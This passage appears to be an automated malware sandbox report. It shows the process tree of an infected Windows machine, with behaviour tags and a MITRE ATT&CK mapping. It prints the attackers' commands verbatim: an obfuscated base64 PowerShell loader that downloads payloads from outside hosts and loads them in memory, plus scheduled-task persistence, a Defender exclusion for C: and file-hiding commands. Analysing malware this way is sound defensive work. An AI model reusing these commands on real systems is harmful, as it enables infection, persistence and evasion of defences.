      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:3232
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2104
    - - C:\Users\Admin\AppData\Local\Temp\10285950101\JZimOyf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285950101\JZimOyf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:676
    - - C:\Users\Admin\AppData\Local\Temp\10285970101\Jump%202.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285970101\Jump%202.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4840
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Adds Run key to start application
        Drops file in Program Files directory
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SysSet.exe" /tr '"C:\Users\Admin\AppData\Roaming\SysSet.exe.exe"' & exit
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5788
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "SysSet.exe" /tr '"C:\Users\Admin\AppData\Roaming\SysSet.exe.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SysSet.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'SysSet.exe-5075' -RunLevel Highest "
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5052
        
        C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe"
        7⤵
        Executes dropped EXE
        
        PID:2116
    - - C:\Users\Admin\AppData\Local\Temp\10285990101\f7a9b0d3cf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285990101\f7a9b0d3cf.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3288
    - - C:\Users\Admin\AppData\Local\Temp\10286000101\564133c059.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286000101\564133c059.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:7088
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286000101\564133c059.exe"
        6⤵
        Downloads MZ/PE file
        Executes dropped EXE
        
        PID:1280
    - - C:\Users\Admin\AppData\Local\Temp\10286010101\d7997010a3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286010101\d7997010a3.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:7176
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67da233bc0788.vbs
        6⤵
        Checks computer location settings
        Modifies registry class
        
        PID:6060
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67da233bc0788.vbs"
        7⤵
        Checks computer location settings
        
        PID:944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@Kw@g@Cc@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@cwBm@Gc@ZwBn@Gc@LwBh@HM@Z@Bh@HM@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@Kw@g@Cc@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBm@HI@RgBm@Ek@Z@Bi@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @($lfsdfsdg + 'bitbucket.org/dsfgggg/asdas/downloads/test2.jpg?137113',$lfsdfsdg + 'ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.frFfIdb/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        
        PID:8060
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        10⤵
        
        PID:6432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6960
    - - C:\Users\Admin\AppData\Local\Temp\10286020101\02530fe7f9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286020101\02530fe7f9.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3308
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4212
    - - C:\Users\Admin\AppData\Local\Temp\10286030101\Jump%202.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286030101\Jump%202.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1928
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:948
    - - C:\Users\Admin\AppData\Local\Temp\10286040101\JZimOyf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286040101\JZimOyf.exe"
        5⤵
        Executes dropped EXE
        
        PID:5728
    - - C:\Users\Admin\AppData\Local\Temp\10286050101\oFkpQ36.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286050101\oFkpQ36.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1716
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5568
    - - C:\Users\Admin\AppData\Local\Temp\10286060101\cidQ6US.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286060101\cidQ6US.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7952
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7640
    - - C:\Users\Admin\AppData\Local\Temp\10286070101\50KfF6O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286070101\50KfF6O.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:6464
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10286070101\50KfF6O.exe
        6⤵
        Views/modifies file attributes
        
        PID:8092
    - - C:\Users\Admin\AppData\Local\Temp\10286080101\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286080101\laf6w_001.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: MapViewOfSection
        
        PID:8024
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:6604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7152
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        
        PID:7020
        
        C:\ProgramData\{8A72303A-817D-4C09-9C57-1A35418EDD09}\putty.exe
        
        "C:\ProgramData\{8A72303A-817D-4C09-9C57-1A35418EDD09}\putty.exe" ""
        7⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:8028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\{CEAC69D0-7766-4C98-873B-D9077595C123}\repare.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{CEAC69D0-7766-4C98-873B-D9077595C123}\repare.exe" "{8A72303A-817D-4C09-9C57-1A35418EDD09}"
        7⤵
        Executes dropped EXE
        
        PID:6272
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        7⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\c80.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c80.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: MapViewOfSection
        
        PID:4516
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        9⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\{1CC8A120-9023-4165-BA55-691F108C2EAB}\hvix64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{1CC8A120-9023-4165-BA55-691F108C2EAB}\hvix64.exe" ""
        10⤵
        Executes dropped EXE
        
        PID:8392
    - - C:\Users\Admin\AppData\Local\Temp\10286090101\WUx3y70.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286090101\WUx3y70.exe"
        5⤵
        Executes dropped EXE
        
        PID:13192
      - C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        
        C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\MyApp\tor.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MyApp\tor.exe"
        8⤵
        Executes dropped EXE
        
        PID:7112
        
        C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\firefox.exe
        
        "C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\firefox.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:752
        
        C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\firefox.exe
        
        C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\firefox.exe
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies Internet Explorer Protected Mode
        Modifies Internet Explorer Protected Mode Banner
        Modifies Internet Explorer settings
        
        PID:7544
        
        C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\tor.exe
        
        "C:\Users\Admin\AppData\Roaming\329E4DB54035D66F\tor.exe"
        10⤵
        Executes dropped EXE
        
        PID:7016
    - - C:\Users\Admin\AppData\Local\Temp\10286100101\WUx3y70.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286100101\WUx3y70.exe"
        5⤵
        Executes dropped EXE
        
        PID:5840
      - C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:8144
        
        C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        
        C:\Users\Admin\AppData\Local\Temp\MyApp\firefox.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4752
    - - C:\Users\Admin\AppData\Local\Temp\10286110101\e4377546ac.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286110101\e4377546ac.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:8128
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6668
    - - C:\Users\Admin\AppData\Local\Temp\10286120101\87ae08f5df.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10286120101\87ae08f5df.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Checks processor information in registry
        
        PID:24132
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h9290.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h9290.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:5008
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3z97M.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3z97M.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1584 -ip 1584
1⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:5256

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3460

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6284

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4344

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1864

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3192

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:948

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:672

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

